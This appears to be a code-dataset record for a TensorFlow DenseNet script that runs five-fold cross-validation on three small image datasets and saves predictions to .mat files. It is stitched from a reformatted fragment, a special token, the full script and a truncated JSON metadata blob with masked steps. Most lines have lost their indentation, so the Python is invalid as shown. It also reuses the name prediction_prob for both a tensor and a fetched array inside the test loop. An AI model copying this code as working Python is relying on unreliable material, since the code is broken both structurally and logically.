t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False}))
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1, wrong,
axis=0)
predicted_list_1 = np.append(predicted_list_1,
predicted, axis=0)
prediction_prob_1 = np.append(prediction_prob_1,
prediction_prob)
Accuracy = Accuracy / num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil(itrt_index * batch_size /
total_trainImages)
                # save the accumulated per-image probabilities, not just the last image's
                sio.savemat('D' + Dataset + '_' + file_name + '_' + str
                    (epoch_around) + 'ep_' + data_type +
                    '_predicted_labels_list.mat', {'wrong_list':
                    wrong_list_1, 'predicted_list': predicted_list_1,
                    'Target_labels': Target_labels, 'prediction_prob':
                    prediction_prob_1, 'b1_list': b1_list, 'b2_list':
                    b2_list, 'b3_list': b3_list, 't1_list': t1_list,
                    't2_list': t2_list, 't3_list': t3_list, 't1_b_list':
                    t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':
                    t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'
% (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = itrt_index * batch_size / total_trainImages
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x: batch[0],
y_: batch[1], keep_prob: 1.0, training: False})
print('step %d, training accuracy %g' % (i, train_accuracy)
)
_, loss = sess.run([train_step, cross_entropy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: dropout_prob,
training: True})
iteration_cost = 0
num_minibatches = int(total_trainImages / batch_size)
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print('Loss: ', loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(1,
number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,
keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop,
predicted_labels_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([
b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop, t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list, wrong, axis=0)
predicted_list = np.append(predicted_list, predicted,
axis=0)
Accuracy = Accuracy / num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %
(batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil(iteration * batch_size / total_trainImages
)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
sio.savemat('D' + Dataset + '_' + file_name + '_' + str(
epoch_around) + 'ep_' + data_type +
'_predicted_labels_list.mat', {'wrong_list': wrong_list,
'predicted_list': predicted_list, 'Target_labels':
Target_labels, 'accuracy_list': accuracy_list,
'list_of_predicted_list': list_of_predicted_list, 'costs':
costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':
b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':
t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,
't3_b_list': t3_b_list})
class MyModel:
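    # Hyperparameters (names match the prints inside densenet()):
    #   num_layers   - conv layers per dense block
    #   k_fm         - growth rate: feature maps each layer adds to its block
    #   fs           - convolution filter size
    #   fm1          - feature maps from the initial convolution
    #   bottleneck   - width multiplier for the 1x1 transition convs (bottleneck * k_fm)
    #   dropout_prob - keep probability passed to tf.nn.dropout (0.8 keeps 80%)
    #   batch_size   - mini-batch size, stored as a one-element list
    #   learn_rate   - Adam learning rate
    #   num_of_test  - number of mid-training evaluation checkpoints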
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
model = MyModel()
densenet('1', 'org', 1, model)
densenet('1', 'org', 2, model)
densenet('1', 'org', 3, model)
densenet('1', 'org', 4, model)
densenet('1', 'org', 5, model)
densenet('1', 'aug', 1, model)
densenet('1', 'aug', 2, model)
densenet('1', 'aug', 3, model)
densenet('1', 'aug', 4, model)
densenet('1', 'aug', 5, model)
densenet('2', 'org', 1, model)
densenet('2', 'org', 2, model)
densenet('2', 'org', 3, model)
densenet('2', 'org', 4, model)
densenet('2', 'org', 5, model)
densenet('2', 'aug', 1, model)
densenet('2', 'aug', 2, model)
densenet('2', 'aug', 3, model)
densenet('2', 'aug', 4, model)
densenet('2', 'aug', 5, model)
densenet('3', 'org', 1, model)
densenet('3', 'org', 2, model)
densenet('3', 'org', 3, model)
densenet('3', 'org', 4, model)
densenet('3', 'org', 5, model)
densenet('3', 'aug', 1, model)
densenet('3', 'aug', 2, model)
densenet('3', 'aug', 3, model)
densenet('3', 'aug', 4, model)
densenet('3', 'aug', 5, model)
<|reserved_special_token_1|>
def densenet(D,DT,F,model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
###############
# load training / testing set from CrossVal folder,
# names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'
# name for testing set, 'D1_1st_fold_test.mat'
###############
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D'+Dataset)
print("path " ,path)
if data_type == 'original':
Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))
else:
Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))
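    # Data layout: *Images arrive as 28x28xN arrays (flattened to N x 784 below);
    # *Labels2 are one-hot matrices that get transposed to N x num_classes.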
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
        if i != num_of_test:
list_to_display.append(int(iteration_to_display*(i+1)))
del i
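    # Channel bookkeeping: each dense block stacks num_layers * k_fm feature maps
    # on top of its input, so the classifier sees fm1 + 3 * num_layers * k_fm maps.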
total_fm_Block_1 = fm1+(num_layers*k_fm)
total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)
total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)
fc_nodes = [total_fm_Block_3 ]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0,2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0,2])
Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels,axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape,n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial,name=n)
def bias_variable(shape,n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial,name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name="W", with_bias=False):
W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)
conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')
if with_bias:
                return conv + bias_variable([ out_features ], name + '_b')  # bias_variable requires a name argument
return conv
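        # Composite layer used everywhere below: BatchNorm -> ReLU -> Conv -> Dropout.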
def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True, training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features, kernel_size, name="W"+str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
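        # Dense block: each layer's output is concatenated onto the running tensor
        # along the channel axis, so layer idx sees every earlier feature map and
        # the channel count grows by `growth` per layer.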
def block(input, layers, in_features, growth, is_training, keep_prob, name="Block_"):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
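        # Topology: initial conv -> 3 dense blocks, each followed by a transition
        # (1x1 conv down to bottleneck*k_fm maps, then fs x fs conv back up) with
        # 2x2 max-pooling after blocks 1-2 and 7x7 average-pooling after block 3.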
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name="W1", with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name="Block_1")
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_2")
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_2"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_3")
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_3"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_3')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
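        # Global 7x7 average pool, then flatten to [batch, features] for the classifier.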
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope("Dense_Last_lyr"):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes],"w_fc3")
b_fc3 = bias_variable([number_of_classes],"b_fc3")
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])
with tf.name_scope("Xent"):
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope("train"):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])
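        # The *_printop tensors are tf.Print identity wrappers; fetching them in
        # sess.run() below returns the wrapped activations / predictions.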
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
            # tf.set_random_seed(0) was being passed as feed_dict here (a no-op); the graph seed is already set above.
            sess.run(tf.global_variables_initializer())
for i in range(iteration):
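                # Manual mini-batching with wrap-around: when the window runs past
                # the end of the training set, stitch the tail and the head together.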
if index_end > total_trainImages:
remaining = total_trainImages - (index_end-batch_size)
images = Train_Images[(index_end-batch_size):total_trainImages, :]
labels = Train_Labels[(index_end-batch_size):total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:index_end, :]))
labels = np.vstack((labels, Train_Labels[index:index_end, :]))
batch = (images, labels)
index = index_end
index_end = index + batch_size
else:
batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' % elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration,i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop,
predicted_labels_printop,prediction_prob_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)
predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)
prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)
Accuracy = Accuracy/num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)
            # save the accumulated per-image probabilities (prediction_prob_1), not only the last image's
            sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels,
            'prediction_prob':prediction_prob_1, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
            't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = (itrt_index * batch_size) / total_trainImages
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x: batch[0], y_: batch[1],
keep_prob: 1.0, training:False})
print('step %d, training accuracy %g' % (i, train_accuracy))
_, loss = sess.run([train_step, cross_entropy],
feed_dict={x: batch[0], y_: batch[1],
keep_prob: dropout_prob, training:True})
            iteration_cost = 0 # cost contribution from this training step
            num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size batch_size in the train set
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print ('Loss: ',loss)
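        # final evaluation over the full test set once training has finished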
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list,wrong,axis=0)
predicted_list = np.append(predicted_list,predicted,axis=0)
Accuracy = Accuracy/num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
        print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, iteration, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil((iteration * batch_size) / total_trainImages)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
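
# shared hyperparameter container consumed by densenet()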
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
model = MyModel()
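
# 5-fold cross-validation over datasets 1-3, on both original and augmented training data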
densenet('1','org',1,model)
densenet('1','org',2,model)
densenet('1','org',3,model)
densenet('1','org',4,model)
densenet('1','org',5,model)

densenet('1','aug',1,model)
densenet('1','aug',2,model)
densenet('1','aug',3,model)
densenet('1','aug',4,model)
densenet('1','aug',5,model)

densenet('2','org',1,model)
densenet('2','org',2,model)
densenet('2','org',3,model)
densenet('2','org',4,model)
densenet('2','org',5,model)

densenet('2','aug',1,model)
densenet('2','aug',2,model)
densenet('2','aug',3,model)
densenet('2','aug',4,model)
densenet('2','aug',5,model)

densenet('3','org',1,model)
densenet('3','org',2,model)
densenet('3','org',3,model)
densenet('3','org',4,model)
densenet('3','org',5,model)

densenet('3','aug',1,model)
densenet('3','aug',2,model)
densenet('3','aug',3,model)
densenet('3','aug',4,model)
densenet('3','aug',5,model)
|
flexible
|
{
"blob_id": "48270f70a9d69d15f808f22ec2d11d337b2c4845",
"index": 7414,
"step-1": "<mask token>\n\n\nclass MyModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-3": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, 